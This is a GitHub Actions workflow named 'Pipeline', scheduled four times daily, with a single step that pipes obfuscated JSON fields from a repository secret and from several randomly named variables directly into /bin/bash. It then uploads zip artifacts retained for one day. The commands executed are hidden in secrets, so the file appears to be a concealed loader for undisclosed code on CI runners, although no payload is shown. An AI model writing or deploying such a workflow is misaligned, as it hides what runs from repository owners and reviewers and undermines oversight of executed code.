name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '8 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          wroqx5: ${{ secrets.wroqx5 }}
        run: |
          printf '%s' "$wroqx5" | jq -r .ca32 | /bin/bash
          echo $qan93 | jq -r .c0977 | /bin/bash
          printf '%s' "$vi001" | jq -r .ig9027 | /bin/bash
          printf '%s' "$x513" | jq -r .rqtcd96639 | /bin/bash
          echo $tnue9287 | jq -r .o2 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: r82Kk4w9
          path: "*.zip"
          retention-days: 1
